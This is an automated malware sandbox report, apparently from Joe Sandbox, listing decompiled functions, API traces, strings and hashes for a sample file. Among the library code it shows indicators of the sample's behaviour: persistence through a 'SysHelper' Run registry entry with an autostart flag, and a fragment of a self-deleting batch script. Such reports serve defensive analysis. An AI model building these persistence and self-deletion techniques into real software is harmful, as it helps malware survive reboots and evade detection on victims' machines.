                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2372642624-488272950
                                                                                                        • Opcode ID: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction ID: 9288ad868330e6beb3553e169c152616d8c298ca4c49b665ccee4b1b562e3688
                                                                                                        • Opcode Fuzzy Hash: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction Fuzzy Hash: C0719F7294021DABDB20DBB0EC89FEA77ADFB44300F004596F649D6050DB799A88DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F735B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                        • API String ID: 909875538-2733969777
                                                                                                        • Opcode ID: e979f065ea4f3c73c9f90dc588524082ac406fc082d02c00b9b428cf2dfaa759
                                                                                                        • Instruction ID: 3ad1735bb235c68e2ba4925fc72fe9eb706752ac004ed8554179e8152b7979e6
                                                                                                        • Opcode Fuzzy Hash: e979f065ea4f3c73c9f90dc588524082ac406fc082d02c00b9b428cf2dfaa759
                                                                                                        • Instruction Fuzzy Hash: 20F1E872A08341BBE721EA24DC42F5B77D89F55714F04482AFE8CD7282E674DA09B793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F35A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503006713-0
                                                                                                        • Opcode ID: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction ID: e9cb9cce1623197742303412616093f997bc08bf43e6866a0c50b5bd5cd345b6
                                                                                                        • Opcode Fuzzy Hash: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction Fuzzy Hash: FD218476509A05EBEB217F65DC02E0FBBD4DFC1FB0F14442AF48496191EE699810FB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F2BB49
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F2BBBA
                                                                                                        • _malloc.LIBCMT ref: 00F2BBE4
                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00F2BBF4
                                                                                                        • _free.LIBCMT ref: 00F2BCD7
                                                                                                          • Part of subcall function 00F21CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                          • Part of subcall function 00F21CD0: _memset.LIBCMT ref: 00F21D3B
                                                                                                          • Part of subcall function 00F21CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                          • Part of subcall function 00F21CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                          • Part of subcall function 00F21CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                          • Part of subcall function 00F21CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • IsWindow.USER32(?), ref: 00F2BF69
                                                                                                        • DestroyWindow.USER32(?), ref: 00F2BF7B
                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00F2BFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3873257347-0
                                                                                                        • Opcode ID: 47e769d4d4bcdcbf82e9d4f804837306c6f4fdbe753364fc72aa05533c98b2d6
                                                                                                        • Instruction ID: a8f0920c281c0871dda94bb2c9981eaa46c4691646094da2b1f99a2ca36b82a9
                                                                                                        • Opcode Fuzzy Hash: 47e769d4d4bcdcbf82e9d4f804837306c6f4fdbe753364fc72aa05533c98b2d6
                                                                                                        • Instruction Fuzzy Hash: 11C1C1719083509FDB20DF24EC4575ABBE4FF85324F144A1DF888872A1D77A9908EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F370A5 Relevance: 18.3, APIs: 12, Instructions: 289COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 559064418-0
                                                                                                        • Opcode ID: 6fcdf23a878520b68f5e2ac10ebc73bfc0f04afa7bc56d338253b712e7ca9e10
                                                                                                        • Instruction ID: 8b8a3ee31fa915432fedd2b324ac8516524d93282240d1a6356e318bb2f8db2d
                                                                                                        • Opcode Fuzzy Hash: 6fcdf23a878520b68f5e2ac10ebc73bfc0f04afa7bc56d338253b712e7ca9e10
                                                                                                        • Instruction Fuzzy Hash: 23B180B1D093299FEF35AB68CC88BA9B7B5EF54330F1400D9E808A6251D7359E80EF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F37B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32 ref: 00F37B29
                                                                                                        • _free.LIBCMT ref: 00F37B42
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        • _free.LIBCMT ref: 00F37B55
                                                                                                        • _free.LIBCMT ref: 00F37B73
                                                                                                        • _free.LIBCMT ref: 00F37B85
                                                                                                        • _free.LIBCMT ref: 00F37B96
                                                                                                        • _free.LIBCMT ref: 00F37BA1
                                                                                                        • _free.LIBCMT ref: 00F37BC5
                                                                                                        • EncodePointer.KERNEL32(00C12AF8), ref: 00F37BCC
                                                                                                        • _free.LIBCMT ref: 00F37BE1
                                                                                                        • _free.LIBCMT ref: 00F37BF7
                                                                                                        • _free.LIBCMT ref: 00F37C1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3064303923-0
                                                                                                        • Opcode ID: 2ba2e7214999c4a92e6f044d206038bac7ef0c4fe9051adff1685b497b34762e
                                                                                                        • Instruction ID: c312eb09095d4551ab8565c947c6113b549d8ce2162e312941319d55b9e89563
                                                                                                        • Opcode Fuzzy Hash: 2ba2e7214999c4a92e6f044d206038bac7ef0c4fe9051adff1685b497b34762e
                                                                                                        • Instruction Fuzzy Hash: 47216DB19093949BCA316F55BC80919BB64BB84374B64403AF884A735CCF7E6840EF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F21BB0
                                                                                                        • CoCreateInstance.OLE32(00FDE908,00000000,00000001,00FDD568,00000000), ref: 00F21BC8
                                                                                                        • CoUninitialize.OLE32 ref: 00F21BD0
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00F21C12
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F21C22
                                                                                                        • lstrcatW.KERNEL32(?,01010050), ref: 00F21C3A
                                                                                                        • lstrcatW.KERNEL32(?), ref: 00F21C44
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00F21C68
                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00F21C7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                        • String ID: \shell32.dll
                                                                                                        • API String ID: 679253221-3783449302
                                                                                                        • Opcode ID: f6e248e342b9b963de36c9bb4af6f989498c5211f946b3813b305cc201bb4834
                                                                                                        • Instruction ID: 30c74240205f41e6d46313149c69317219a2e44cb95582b786fb5713fd057c2e
                                                                                                        • Opcode Fuzzy Hash: f6e248e342b9b963de36c9bb4af6f989498c5211f946b3813b305cc201bb4834
                                                                                                        • Instruction Fuzzy Hash: 58415A75A8021DAFDB20CBA4DC88FEA7BBDAF48704F004599B505EB190D6B1AA45DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F649A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                        • GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                        • GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                        • GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                        • _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                        • Opcode ID: 7c38936635e6e1d69c2833bcc051200f635587ed7ceb041c4fc5ff8e5b72297b
                                                                                                        • Instruction ID: d12527e4c9df7372a083a5fb36762317bc3eded651f8df3ce0e17ca1b69cceb0
                                                                                                        • Opcode Fuzzy Hash: 7c38936635e6e1d69c2833bcc051200f635587ed7ceb041c4fc5ff8e5b72297b
                                                                                                        • Instruction Fuzzy Hash: F431A631A40109ABDB20EFF9EC46AAE77B9EF44730F104256E856D71D0EB35A900EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F64AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F4,00F64C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F6480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64AFA
                                                                                                        • GetFileType.KERNEL32(00000000,?,00F61D37,00000000,00F1CDAE,00000001,00000001), ref: 00F64B05
                                                                                                        • __vfwprintf_p.LIBCMT ref: 00F64B27
                                                                                                          • Part of subcall function 00F3BDCC: _vfprintf_helper.LIBCMT ref: 00F3BDDF
                                                                                                        • vswprintf.LIBCMT ref: 00F64B5D
                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00F64B7E
                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F64BA2
                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00F64BA9
                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00F64BD3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                        • API String ID: 277090408-1348657634
                                                                                                        • Opcode ID: 02ea8b858052c910c91374766f6f5ebd5fb0c3304f6452f3dd868617c642f063
                                                                                                        • Instruction ID: 93c3aa9506c13b864dddd1dbbf36cdf5fb464dc2e1000ac5dd6295d8db3a6bb0
                                                                                                        • Opcode Fuzzy Hash: 02ea8b858052c910c91374766f6f5ebd5fb0c3304f6452f3dd868617c642f063
                                                                                                        • Instruction Fuzzy Hash: C121D771648345ABE730AB70CC4BFEF7799AF88710F44481AB699C61D0EAB99440E793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F22389
                                                                                                        • _memset.LIBCMT ref: 00F223B6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00F223DE
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F223E7
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F223F4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F223FF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2240E
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00F22422
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00F2237F
                                                                                                        • SysHelper, xrefs: 00F223D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                        • API String ID: 122392481-4165002228
                                                                                                        • Opcode ID: f709b923e41ae361e6cf431d35e768d254ad2e48f92c1666c2427fe2d9a4939b
                                                                                                        • Instruction ID: 01b89c7d327f8ae033cc4b462486e54cdd87e573019fbe052350716fa5590393
                                                                                                        • Opcode Fuzzy Hash: f709b923e41ae361e6cf431d35e768d254ad2e48f92c1666c2427fe2d9a4939b
                                                                                                        • Instruction Fuzzy Hash: 77112C7194021DBBDF10DFA0DC49FEE77BDBB04705F0045A6B549E2151DBB45A84EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F35B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1077091919-0
                                                                                                        • Opcode ID: b81c2413aa2c586c542bbea3ec346c9ca293906e89016a6327b1bd20237b9813
                                                                                                        • Instruction ID: 0c5496a13978757359c5b6260b0ff0c859be72b1c8090643f8f5cb349d7334c9
                                                                                                        • Opcode Fuzzy Hash: b81c2413aa2c586c542bbea3ec346c9ca293906e89016a6327b1bd20237b9813
                                                                                                        • Instruction Fuzzy Hash: 7941C432904704AFDB11AFA4DC86B9E77E5AF84734F20402EF51497142DB7EA645EB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F28000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
